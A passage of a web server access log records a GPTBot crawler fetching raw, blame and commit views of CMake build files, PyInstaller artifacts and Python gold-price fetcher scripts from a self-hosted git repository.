74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13452] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:14:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 2814856] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:14:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13346] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:14:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19488] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:14:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13347] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:14:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11402] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:14:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19489] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:14:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:14:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:14:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:14:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12966] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" -[17/Feb/2026:14:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13478] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:14:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 1531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:14:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:14:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" -[17/Feb/2026:14:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" -[17/Feb/2026:14:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" -[17/Feb/2026:14:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12578] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:14:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10657] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" -[17/Feb/2026:14:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 1531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:14:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10168] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" -[17/Feb/2026:14:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10663] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" -[17/Feb/2026:14:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12609] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:14:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10770] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108401] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107171] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr 